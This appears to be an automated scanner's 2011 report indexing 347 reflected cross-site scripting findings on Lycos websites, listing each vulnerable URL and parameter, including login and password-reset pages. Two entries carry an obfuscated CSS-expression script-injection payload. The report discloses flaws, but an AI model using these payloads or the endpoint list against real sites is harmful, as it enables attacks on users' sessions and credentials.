lycos.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in Lycos HTTP Systems | CloudScan Vulnerability Crawler Report

Report generated by XSS.CX at Mon Feb 07 15:58:41 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://classifieds.lycos.ca/ [name of an arbitrarily supplied request parameter]

1.2. http://classifieds.lycos.co.nz/ [name of an arbitrarily supplied request parameter]

1.3. http://classifieds.lycos.co.uk/ [name of an arbitrarily supplied request parameter]

1.4. http://classifieds.lycos.com/ [mobile parameter]

1.5. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

1.6. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 1]

1.7. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 2]

1.8. http://classifieds.lycos.com/ajax/submission.php [name of an arbitrarily supplied request parameter]

1.9. http://classifieds.lycos.com/bootstrap.js [REST URL parameter 1]

1.10. http://classifieds.lycos.com/browse/ [REST URL parameter 1]

1.11. http://classifieds.lycos.com/browse/ [name of an arbitrarily supplied request parameter]

1.12. http://classifieds.lycos.com/community-rideshare/ [REST URL parameter 1]

1.13. http://classifieds.lycos.com/community-rideshare/ [name of an arbitrarily supplied request parameter]

1.14. http://classifieds.lycos.com/community/ [REST URL parameter 1]

1.15. http://classifieds.lycos.com/community/ [name of an arbitrarily supplied request parameter]

1.16. http://classifieds.lycos.com/housing-rent-apartment/ [REST URL parameter 1]

1.17. http://classifieds.lycos.com/housing-rent-apartment/ [name of an arbitrarily supplied request parameter]

1.18. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 1]

1.19. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 2]

1.20. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [name of an arbitrarily supplied request parameter]

1.21. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 1]

1.22. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 2]

1.23. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [name of an arbitrarily supplied request parameter]

1.24. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 1]

1.25. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 2]

1.26. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [name of an arbitrarily supplied request parameter]

1.27. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 1]

1.28. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 2]

1.29. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [name of an arbitrarily supplied request parameter]

1.30. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [REST URL parameter 1]

1.31. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [name of an arbitrarily supplied request parameter]

1.32. http://classifieds.lycos.com/housing-rent-condo/ [REST URL parameter 1]

1.33. http://classifieds.lycos.com/housing-rent-condo/ [name of an arbitrarily supplied request parameter]

1.34. http://classifieds.lycos.com/housing-rent-home/ [REST URL parameter 1]

1.35. http://classifieds.lycos.com/housing-rent-home/ [name of an arbitrarily supplied request parameter]

1.36. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 1]

1.37. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 2]

1.38. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [name of an arbitrarily supplied request parameter]

1.39. http://classifieds.lycos.com/housing-rent-roommates/ [REST URL parameter 1]

1.40. http://classifieds.lycos.com/housing-rent-roommates/ [name of an arbitrarily supplied request parameter]

1.41. http://classifieds.lycos.com/housing-rent-short_term/ [REST URL parameter 1]

1.42. http://classifieds.lycos.com/housing-rent-short_term/ [name of an arbitrarily supplied request parameter]

1.43. http://classifieds.lycos.com/housing-rent-storage/ [REST URL parameter 1]

1.44. http://classifieds.lycos.com/housing-rent-storage/ [name of an arbitrarily supplied request parameter]

1.45. http://classifieds.lycos.com/housing-rent-vacation/ [REST URL parameter 1]

1.46. http://classifieds.lycos.com/housing-rent-vacation/ [name of an arbitrarily supplied request parameter]

1.47. http://classifieds.lycos.com/housing-rent/ [REST URL parameter 1]

1.48. http://classifieds.lycos.com/housing-rent/ [name of an arbitrarily supplied request parameter]

1.49. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [REST URL parameter 1]

1.50. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [name of an arbitrarily supplied request parameter]

1.51. http://classifieds.lycos.com/housing-sale-commercial-retail/ [REST URL parameter 1]

1.52. http://classifieds.lycos.com/housing-sale-commercial-retail/ [name of an arbitrarily supplied request parameter]

1.53. http://classifieds.lycos.com/housing-sale-condo/ [REST URL parameter 1]

1.54. http://classifieds.lycos.com/housing-sale-condo/ [name of an arbitrarily supplied request parameter]

1.55. http://classifieds.lycos.com/housing-sale-foreclosure/ [REST URL parameter 1]

1.56. http://classifieds.lycos.com/housing-sale-foreclosure/ [name of an arbitrarily supplied request parameter]

1.57. http://classifieds.lycos.com/housing-sale-home/ [REST URL parameter 1]

1.58. http://classifieds.lycos.com/housing-sale-home/ [name of an arbitrarily supplied request parameter]

1.59. http://classifieds.lycos.com/housing-sale-land/ [REST URL parameter 1]

1.60. http://classifieds.lycos.com/housing-sale-land/ [name of an arbitrarily supplied request parameter]

1.61. http://classifieds.lycos.com/housing-sale-multi_family/ [REST URL parameter 1]

1.62. http://classifieds.lycos.com/housing-sale-multi_family/ [name of an arbitrarily supplied request parameter]

1.63. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

1.64. http://classifieds.lycos.com/housing-sale-vacation/ [REST URL parameter 1]

1.65. http://classifieds.lycos.com/housing-sale-vacation/ [name of an arbitrarily supplied request parameter]

1.66. http://classifieds.lycos.com/housing-sale/ [REST URL parameter 1]

1.67. http://classifieds.lycos.com/housing-sale/ [name of an arbitrarily supplied request parameter]

1.68. http://classifieds.lycos.com/job-admin/ [REST URL parameter 1]

1.69. http://classifieds.lycos.com/job-admin/ [name of an arbitrarily supplied request parameter]

1.70. http://classifieds.lycos.com/job-advertising/ [REST URL parameter 1]

1.71. http://classifieds.lycos.com/job-advertising/ [name of an arbitrarily supplied request parameter]

1.72. http://classifieds.lycos.com/job-customer_service/ [REST URL parameter 1]

1.73. http://classifieds.lycos.com/job-customer_service/ [name of an arbitrarily supplied request parameter]

1.74. http://classifieds.lycos.com/job-finance/ [REST URL parameter 1]

1.75. http://classifieds.lycos.com/job-finance/ [name of an arbitrarily supplied request parameter]

1.76. http://classifieds.lycos.com/job-nonprofit/ [REST URL parameter 1]

1.77. http://classifieds.lycos.com/job-nonprofit/ [name of an arbitrarily supplied request parameter]

1.78. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

1.79. http://classifieds.lycos.com/job-retail/ [REST URL parameter 1]

1.80. http://classifieds.lycos.com/job-retail/ [name of an arbitrarily supplied request parameter]

1.81. http://classifieds.lycos.com/job-sales/ [REST URL parameter 1]

1.82. http://classifieds.lycos.com/job-sales/ [name of an arbitrarily supplied request parameter]

1.83. http://classifieds.lycos.com/job-tech/ [REST URL parameter 1]

1.84. http://classifieds.lycos.com/job-tech/ [name of an arbitrarily supplied request parameter]

1.85. http://classifieds.lycos.com/job-work_from_home/ [REST URL parameter 1]

1.86. http://classifieds.lycos.com/job-work_from_home/ [name of an arbitrarily supplied request parameter]

1.87. http://classifieds.lycos.com/job/ [REST URL parameter 1]

1.88. http://classifieds.lycos.com/job/ [name of an arbitrarily supplied request parameter]

1.89. http://classifieds.lycos.com/personals/ [REST URL parameter 1]

1.90. http://classifieds.lycos.com/personals/ [name of an arbitrarily supplied request parameter]

1.91. http://classifieds.lycos.com/post/ [REST URL parameter 1]

1.92. http://classifieds.lycos.com/post/ [name of an arbitrarily supplied request parameter]

1.93. http://classifieds.lycos.com/sale-clothes/ [REST URL parameter 1]

1.94. http://classifieds.lycos.com/sale-clothes/ [name of an arbitrarily supplied request parameter]

1.95. http://classifieds.lycos.com/sale-collectible/ [REST URL parameter 1]

1.96. http://classifieds.lycos.com/sale-collectible/ [name of an arbitrarily supplied request parameter]

1.97. http://classifieds.lycos.com/sale-electronics/ [REST URL parameter 1]

1.98. http://classifieds.lycos.com/sale-electronics/ [name of an arbitrarily supplied request parameter]

1.99. http://classifieds.lycos.com/sale-entertainment/ [REST URL parameter 1]

1.100. http://classifieds.lycos.com/sale-entertainment/ [name of an arbitrarily supplied request parameter]

1.101. http://classifieds.lycos.com/sale-free/ [REST URL parameter 1]

1.102. http://classifieds.lycos.com/sale-free/ [name of an arbitrarily supplied request parameter]

1.103. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 1]

1.104. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [REST URL parameter 2]

1.105. http://classifieds.lycos.com/sale-furniture-bed/pillow-top-mattress-and-spring-we-are-moving-to-a-smaller-home-2416139805 [name of an arbitrarily supplied request parameter]

1.106. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 1]

1.107. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [REST URL parameter 2]

1.108. http://classifieds.lycos.com/sale-furniture-sofa/sofas-furnishings-other-2416111056 [name of an arbitrarily supplied request parameter]

1.109. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 1]

1.110. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [REST URL parameter 2]

1.111. http://classifieds.lycos.com/sale-furniture-table/dining-table-dining-and-kitchen-2416111088 [name of an arbitrarily supplied request parameter]

1.112. http://classifieds.lycos.com/sale-furniture/ [REST URL parameter 1]

1.113. http://classifieds.lycos.com/sale-furniture/ [name of an arbitrarily supplied request parameter]

1.114. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 1]

1.115. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [REST URL parameter 2]

1.116. http://classifieds.lycos.com/sale-furniture/entertainment-center-7-x6-x17-in-2-sections-w-glass-doors-2416130146 [name of an arbitrarily supplied request parameter]

1.117. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 1]

1.118. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [REST URL parameter 2]

1.119. http://classifieds.lycos.com/sale-furniture/table-and-4-chairs-like-new-blonde-table-and-4-chairs-like-new-2416139818 [name of an arbitrarily supplied request parameter]

1.120. http://classifieds.lycos.com/sale-home-appliance/ [REST URL parameter 1]

1.121. http://classifieds.lycos.com/sale-home-appliance/ [name of an arbitrarily supplied request parameter]

1.122. http://classifieds.lycos.com/sale-kid/ [REST URL parameter 1]

1.123. http://classifieds.lycos.com/sale-kid/ [name of an arbitrarily supplied request parameter]

1.124. http://classifieds.lycos.com/sale-music/ [REST URL parameter 1]

1.125. http://classifieds.lycos.com/sale-music/ [name of an arbitrarily supplied request parameter]

1.126. http://classifieds.lycos.com/sale-pet-bird/ [REST URL parameter 1]

1.127. http://classifieds.lycos.com/sale-pet-bird/ [name of an arbitrarily supplied request parameter]

1.128. http://classifieds.lycos.com/sale-pet-cat/ [REST URL parameter 1]

1.129. http://classifieds.lycos.com/sale-pet-cat/ [name of an arbitrarily supplied request parameter]

1.130. http://classifieds.lycos.com/sale-pet-dog/ [REST URL parameter 1]

1.131. http://classifieds.lycos.com/sale-pet-dog/ [name of an arbitrarily supplied request parameter]

1.132. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 1]

1.133. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [REST URL parameter 2]

1.134. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [name of an arbitrarily supplied request parameter]

1.135. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 1]

1.136. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [REST URL parameter 2]

1.137. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [name of an arbitrarily supplied request parameter]

1.138. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 1]

1.139. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [REST URL parameter 2]

1.140. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [name of an arbitrarily supplied request parameter]

1.141. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 1]

1.142. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [REST URL parameter 2]

1.143. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [name of an arbitrarily supplied request parameter]

1.144. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 1]

1.145. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [REST URL parameter 2]

1.146. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [name of an arbitrarily supplied request parameter]

1.147. http://classifieds.lycos.com/sale-pet-fish/ [REST URL parameter 1]

1.148. http://classifieds.lycos.com/sale-pet-fish/ [name of an arbitrarily supplied request parameter]

1.149. http://classifieds.lycos.com/sale-pet-supply/ [REST URL parameter 1]

1.150. http://classifieds.lycos.com/sale-pet-supply/ [name of an arbitrarily supplied request parameter]

1.151. http://classifieds.lycos.com/sale-pet/ [REST URL parameter 1]

1.152. http://classifieds.lycos.com/sale-pet/ [name of an arbitrarily supplied request parameter]

1.153. http://classifieds.lycos.com/sale-sale-garage/ [REST URL parameter 1]

1.154. http://classifieds.lycos.com/sale-sale-garage/ [name of an arbitrarily supplied request parameter]

1.155. http://classifieds.lycos.com/sale-tickets-concert/ [REST URL parameter 1]

1.156. http://classifieds.lycos.com/sale-tickets-concert/ [name of an arbitrarily supplied request parameter]

1.157. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [REST URL parameter 1]

1.158. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [name of an arbitrarily supplied request parameter]

1.159. http://classifieds.lycos.com/sale-tickets-group-festival/ [REST URL parameter 1]

1.160. http://classifieds.lycos.com/sale-tickets-group-festival/ [name of an arbitrarily supplied request parameter]

1.161. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [REST URL parameter 1]

1.162. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [name of an arbitrarily supplied request parameter]

1.163. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [REST URL parameter 1]

1.164. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [name of an arbitrarily supplied request parameter]

1.165. http://classifieds.lycos.com/sale-tickets-sports/ [REST URL parameter 1]

1.166. http://classifieds.lycos.com/sale-tickets-sports/ [name of an arbitrarily supplied request parameter]

1.167. http://classifieds.lycos.com/sale-tickets-theater/ [REST URL parameter 1]

1.168. http://classifieds.lycos.com/sale-tickets-theater/ [name of an arbitrarily supplied request parameter]

1.169. http://classifieds.lycos.com/sale-tickets/ [REST URL parameter 1]

1.170. http://classifieds.lycos.com/sale-tickets/ [name of an arbitrarily supplied request parameter]

1.171. http://classifieds.lycos.com/sale-toy/ [REST URL parameter 1]

1.172. http://classifieds.lycos.com/sale-toy/ [name of an arbitrarily supplied request parameter]

1.173. http://classifieds.lycos.com/sale/ [REST URL parameter 1]

1.174. http://classifieds.lycos.com/sale/ [name of an arbitrarily supplied request parameter]

1.175. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

1.176. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

1.177. http://classifieds.lycos.com/service-car/ [name of an arbitrarily supplied request parameter]

1.178. http://classifieds.lycos.com/service-care/ [REST URL parameter 1]

1.179. http://classifieds.lycos.com/service-care/ [name of an arbitrarily supplied request parameter]

1.180. http://classifieds.lycos.com/service-cleaning/ [REST URL parameter 1]

1.181. http://classifieds.lycos.com/service-cleaning/ [name of an arbitrarily supplied request parameter]

1.182. http://classifieds.lycos.com/service-coupon/ [REST URL parameter 1]

1.183. http://classifieds.lycos.com/service-coupon/ [name of an arbitrarily supplied request parameter]

1.184. http://classifieds.lycos.com/service-creative-design/ [REST URL parameter 1]

1.185. http://classifieds.lycos.com/service-creative-design/ [name of an arbitrarily supplied request parameter]

1.186. http://classifieds.lycos.com/service-education-tutor/ [REST URL parameter 1]

1.187. http://classifieds.lycos.com/service-education-tutor/ [name of an arbitrarily supplied request parameter]

1.188. http://classifieds.lycos.com/service-entertainment-catering/ [REST URL parameter 1]

1.189. http://classifieds.lycos.com/service-entertainment-catering/ [name of an arbitrarily supplied request parameter]

1.190. http://classifieds.lycos.com/service-health/ [REST URL parameter 1]

1.191. http://classifieds.lycos.com/service-health/ [name of an arbitrarily supplied request parameter]

1.192. http://classifieds.lycos.com/service-home-appliance/ [REST URL parameter 1]

1.193. http://classifieds.lycos.com/service-home-appliance/ [name of an arbitrarily supplied request parameter]

1.194. http://classifieds.lycos.com/service-home-plumbing/ [REST URL parameter 1]

1.195. http://classifieds.lycos.com/service-home-plumbing/ [name of an arbitrarily supplied request parameter]

1.196. http://classifieds.lycos.com/service-lawn/ [REST URL parameter 1]

1.197. http://classifieds.lycos.com/service-lawn/ [name of an arbitrarily supplied request parameter]

1.198. http://classifieds.lycos.com/service-move/ [REST URL parameter 1]

1.199. http://classifieds.lycos.com/service-move/ [name of an arbitrarily supplied request parameter]

1.200. http://classifieds.lycos.com/service-pet-grooming/ [REST URL parameter 1]

1.201. http://classifieds.lycos.com/service-pet-grooming/ [name of an arbitrarily supplied request parameter]

1.202. http://classifieds.lycos.com/service-pet-sitter/ [REST URL parameter 1]

1.203. http://classifieds.lycos.com/service-pet-sitter/ [name of an arbitrarily supplied request parameter]

1.204. http://classifieds.lycos.com/service-pet-veterinarian/ [REST URL parameter 1]

1.205. http://classifieds.lycos.com/service-pet-veterinarian/ [name of an arbitrarily supplied request parameter]

1.206. http://classifieds.lycos.com/service-tech/ [REST URL parameter 1]

1.207. http://classifieds.lycos.com/service-tech/ [name of an arbitrarily supplied request parameter]

1.208. http://classifieds.lycos.com/service/ [REST URL parameter 1]

1.209. http://classifieds.lycos.com/service/ [name of an arbitrarily supplied request parameter]

1.210. http://classifieds.lycos.com/sitemap/ [REST URL parameter 1]

1.211. http://classifieds.lycos.com/sitemap/ [name of an arbitrarily supplied request parameter]

1.212. http://classifieds.lycos.com/vehicle-boat/ [REST URL parameter 1]

1.213. http://classifieds.lycos.com/vehicle-boat/ [name of an arbitrarily supplied request parameter]

1.214. http://classifieds.lycos.com/vehicle-car-convertible/ [REST URL parameter 1]

1.215. http://classifieds.lycos.com/vehicle-car-convertible/ [name of an arbitrarily supplied request parameter]

1.216. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 1]

1.217. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [REST URL parameter 2]

1.218. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [name of an arbitrarily supplied request parameter]

1.219. http://classifieds.lycos.com/vehicle-car-mini_van/ [REST URL parameter 1]

1.220. http://classifieds.lycos.com/vehicle-car-mini_van/ [name of an arbitrarily supplied request parameter]

1.221. http://classifieds.lycos.com/vehicle-car-sedan/ [REST URL parameter 1]

1.222. http://classifieds.lycos.com/vehicle-car-sedan/ [name of an arbitrarily supplied request parameter]

1.223. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 1]

1.224. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 2]

1.225. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [name of an arbitrarily supplied request parameter]

1.226. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 1]

1.227. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 2]

1.228. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [name of an arbitrarily supplied request parameter]

1.229. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 1]

1.230. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 2]

1.231. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [name of an arbitrarily supplied request parameter]

1.232. http://classifieds.lycos.com/vehicle-car-suv/ [REST URL parameter 1]

1.233. http://classifieds.lycos.com/vehicle-car-suv/ [name of an arbitrarily supplied request parameter]

1.234. http://classifieds.lycos.com/vehicle-car-truck/ [REST URL parameter 1]

1.235. http://classifieds.lycos.com/vehicle-car-truck/ [name of an arbitrarily supplied request parameter]

1.236. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 1]

1.237. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [REST URL parameter 2]

1.238. http://classifieds.lycos.com/vehicle-car/2008-ford-40k-miles-2416144596 [name of an arbitrarily supplied request parameter]

1.239. http://classifieds.lycos.com/vehicle-motorcycle/ [REST URL parameter 1]

1.240. http://classifieds.lycos.com/vehicle-motorcycle/ [name of an arbitrarily supplied request parameter]

1.241. http://classifieds.lycos.com/vehicle-parts/ [REST URL parameter 1]

1.242. http://classifieds.lycos.com/vehicle-parts/ [name of an arbitrarily supplied request parameter]

1.243. http://classifieds.lycos.com/vehicle/ [REST URL parameter 1]

1.244. http://classifieds.lycos.com/vehicle/ [name of an arbitrarily supplied request parameter]

1.245. http://classifieds.lycos.com.au/ [name of an arbitrarily supplied request parameter]

1.246. http://classifieds.lycos.in/ [name of an arbitrarily supplied request parameter]

1.247. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]

1.248. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]

1.249. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]

1.250. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]

1.251. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]

1.252. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]

1.253. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]

1.254. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]

1.255. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]

1.256. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]

1.257. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]

1.258. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]

1.259. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]

1.260. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]

1.261. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]

1.262. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]

1.263. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]

1.264. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]

1.265. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]

1.266. http://deals.lycos.com/deals/stores/mwave-521 [name of an arbitrarily supplied request parameter]

1.267. http://deals.lycos.com/deals/stores/tigerdirect-597 [name of an arbitrarily supplied request parameter]

1.268. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]

1.269. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]

1.270. http://jobs.lycos.com/search [l parameter]

1.271. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]

1.272. http://jobs.lycos.com/search [q parameter]

1.273. http://jobs.lycos.com/search [x parameter]

1.274. http://jobs.lycos.com/search [x parameter]

1.275. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]

1.276. http://peoplesearch.lycos.com/ [search-type parameter]

1.277. http://peoplesearch.lycos.com/ [tab parameter]

1.278. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]

1.279. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]

1.280. https://registration.lycos.com/login.php [name of an arbitrarily supplied request parameter]

1.281. https://registration.lycos.com/lostpassword.php [name of an arbitrarily supplied request parameter]

1.282. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

1.283. https://registration.lycos.com/lostpassword.php/%22%20stYle=%22x:expre/**/ssion(alert(9)) [REST URL parameter 2]

1.284. http://search.lycos.com/ [cat parameter]

1.285. http://search.lycos.com/ [cat parameter]

1.286. http://search.lycos.com/ [mobile parameter]

1.287. http://search.lycos.com/ [name of an arbitrarily supplied request parameter]

1.288. http://search.lycos.com/ [query parameter]

1.289. http://search.lycos.com/ [src parameter]

1.290. http://search.lycos.com/ [tab parameter]

1.291. http://search.lycos.com/image/ [cat parameter]

1.292. http://search.lycos.com/image/ [cat parameter]

1.293. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]

1.294. http://search.lycos.com/image/ [tab parameter]

1.295. http://search.lycos.com/video/ [cat parameter]

1.296. http://search.lycos.com/video/ [cat parameter]

1.297. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]

1.298. http://search.lycos.com/video/ [tab parameter]

1.299. http://www.lycos.at/ [name of an arbitrarily supplied request parameter]

1.300. http://www.lycos.at/ [utm_campaign parameter]

1.301. http://www.lycos.at/ [utm_medium parameter]

1.302. http://www.lycos.at/ [utm_source parameter]

1.303. http://www.lycos.be/ [name of an arbitrarily supplied request parameter]

1.304. http://www.lycos.be/ [utm_campaign parameter]

1.305. http://www.lycos.be/ [utm_medium parameter]

1.306. http://www.lycos.be/ [utm_source parameter]

1.307. http://www.lycos.ca/ [name of an arbitrarily supplied request parameter]

1.308. http://www.lycos.ca/ [utm_campaign parameter]

1.309. http://www.lycos.ca/ [utm_medium parameter]

1.310. http://www.lycos.ca/ [utm_source parameter]

1.311. http://www.lycos.ch/ [name of an arbitrarily supplied request parameter]

1.312. http://www.lycos.ch/ [utm_campaign parameter]

1.313. http://www.lycos.ch/ [utm_medium parameter]

1.314. http://www.lycos.ch/ [utm_source parameter]

1.315. http://www.lycos.cl/ [name of an arbitrarily supplied request parameter]

1.316. http://www.lycos.cl/ [utm_campaign parameter]

1.317. http://www.lycos.cl/ [utm_medium parameter]

1.318. http://www.lycos.cl/ [utm_source parameter]

1.319. http://www.lycos.co.jp/ [name of an arbitrarily supplied request parameter]

1.320. http://www.lycos.co.jp/ [utm_campaign parameter]

1.321. http://www.lycos.co.jp/ [utm_medium parameter]

1.322. http://www.lycos.co.jp/ [utm_source parameter]

1.323. http://www.lycos.co.kr/ [name of an arbitrarily supplied request parameter]

1.324. http://www.lycos.co.kr/ [utm_campaign parameter]

1.325. http://www.lycos.co.kr/ [utm_medium parameter]

1.326. http://www.lycos.co.kr/ [utm_source parameter]

1.327. http://www.lycos.co.nz/ [name of an arbitrarily supplied request parameter]

1.328. http://www.lycos.co.nz/ [utm_campaign parameter]

1.329. http://www.lycos.co.nz/ [utm_medium parameter]

1.330. http://www.lycos.co.nz/ [utm_source parameter]

1.331. http://www.lycos.co.uk/ [name of an arbitrarily supplied request parameter]

1.332. http://www.lycos.co.uk/ [utm_campaign parameter]

1.333. http://www.lycos.co.uk/ [utm_medium parameter]

1.334. http://www.lycos.co.uk/ [utm_source parameter]

1.335. http://www.lycos.com.ar/ [name of an arbitrarily supplied request parameter]

1.336. http://www.lycos.com.ar/ [utm_campaign parameter]

1.337. http://www.lycos.com.ar/ [utm_medium parameter]

1.338. http://www.lycos.com.ar/ [utm_source parameter]

1.339. http://www.lycos.com.au/ [name of an arbitrarily supplied request parameter]

1.340. http://www.lycos.com.au/ [utm_campaign parameter]

1.341. http://www.lycos.com.au/ [utm_medium parameter]

1.342. http://www.lycos.com.au/ [utm_source parameter]

1.343. http://www.lycos.com.br/ [name of an arbitrarily supplied request parameter]

1.344. http://www.lycos.com.br/ [utm_campaign parameter]

1.345. http://www.lycos.com.br/ [utm_medium parameter]

1.346. http://www.lycos.com.br/ [utm_source parameter]

1.347. http://www.lycos.com.co/ [name of an arbitrarily supplied request parameter]

